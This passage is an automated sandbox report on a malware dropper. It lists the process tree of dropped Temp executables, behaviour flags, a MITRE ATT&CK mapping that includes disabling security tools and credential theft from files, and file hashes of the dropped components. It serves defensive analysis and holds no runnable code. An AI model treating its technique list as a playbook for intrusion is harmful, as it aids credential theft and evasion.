                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:4780
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\36EA.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\36EA.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:4028
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\36EA.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\36EA.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6128
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4051.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4051.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:5256
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\48CE.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\48CE.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5132
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4FE3.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4FE3.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5832
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5732
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5652
                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4692
                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:4460
                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5044
                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    PID:5888
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5524
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                      PID:4560
                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:6044
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4252
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1168
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1840
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A4E3.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A4E3.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:700
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3000
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3548

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Persistence

                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                1
                                                                                                                                                                                T1031

                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                1
                                                                                                                                                                                T1060

                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                1
                                                                                                                                                                                T1197

                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                Modify Registry

                                                                                                                                                                                5
                                                                                                                                                                                T1112

                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                3
                                                                                                                                                                                T1089

                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                1
                                                                                                                                                                                T1497

                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                1
                                                                                                                                                                                T1197

                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                1
                                                                                                                                                                                T1130

                                                                                                                                                                                Credential Access

                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                4
                                                                                                                                                                                T1081

                                                                                                                                                                                Discovery

                                                                                                                                                                                Query Registry

                                                                                                                                                                                7
                                                                                                                                                                                T1012

                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                1
                                                                                                                                                                                T1497

                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                7
                                                                                                                                                                                T1082

                                                                                                                                                                                Security Software Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1063

                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1120

                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1018

                                                                                                                                                                                Collection

                                                                                                                                                                                Data from Local System

                                                                                                                                                                                4
                                                                                                                                                                                T1005

                                                                                                                                                                                Command and Control

                                                                                                                                                                                Web Service

                                                                                                                                                                                1
                                                                                                                                                                                T1102

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                  MD5

                                                                                                                                                                                  38b33d357b48f05e2e68d4f8a1db047a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8ce535f29afb1fa588d7152fcc59f35cefc987ba

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                  MD5

                                                                                                                                                                                  5ff584af05cab237078a6630a50548fe

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1d0bfb0a4debbe18190d43569d22bed7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1040b43823c18b96a15356f5ae985ffca8ddf2ad

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  aec0e41b66b860ceb9aad6dfa044568ca0a273b7bd37e241f4a6490117265fc8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a8c6692913a2d85217382e96f1db05b71fe3542a288600c5c2581a56469ab2589f13094f618c627cb291bd9b882350ad53f2d26902271c4c8413c45d51e28519

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                  MD5

                                                                                                                                                                                  40ab8c1df8404c62de6aa698b5d3ca18

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c94d35b836b35948a91a2a64c2739c9d1ea10ab3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2847d98ec5357c0a9c6fef3ac6aba046f072e4f4924e7bd06662006932d03e2d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  89385c16de146f0c93306c2d1736c1092384e28c7fb680b5ce22a84cdeeb2b310a3d680a6a0d9663f548568df415a8864c480f05f80b847f7932871e08d1e754

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\libcurl.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\libcurlpp.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\libgcc_s_dw2-1.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\libstdc++-6.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\libwinpthread-1.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\setup_install.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\setup_install.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_1.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_2.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_2.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_3.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_3.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_4.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_4.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_5.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_5.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_6.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_6.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                  MD5

                                                                                                                                                                                  1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  MD5

                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                • C:\Users\Admin\Documents\00ZZ2Fjroem9_WVhevbt4dKl.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  94e19e35ea53bd1fc23afdf0fce3d02e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  91eb2c31c507b888ae854d779d08a69d9807ac7e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  75ebf0114e8623807349ca5a251d6fa3175f65b4d57a988d355286f4ef5f93e3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fec09c58b289dc5b9a74ac25634ce8dc5325d5e895e3b8902b31d8998c699cdaa018db98b1b53b8578f219d34b9a18a3346db1638594ea37099aa0f7603e09c7

                                                                                                                                                                                • C:\Users\Admin\Documents\00ZZ2Fjroem9_WVhevbt4dKl.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  94e19e35ea53bd1fc23afdf0fce3d02e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  91eb2c31c507b888ae854d779d08a69d9807ac7e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  75ebf0114e8623807349ca5a251d6fa3175f65b4d57a988d355286f4ef5f93e3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fec09c58b289dc5b9a74ac25634ce8dc5325d5e895e3b8902b31d8998c699cdaa018db98b1b53b8578f219d34b9a18a3346db1638594ea37099aa0f7603e09c7

                                                                                                                                                                                • C:\Users\Admin\Documents\F0SdS9cAXj43D_d6gw80KEYt.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  52303e3dc2b3b9ad36ba6169418c5bd2

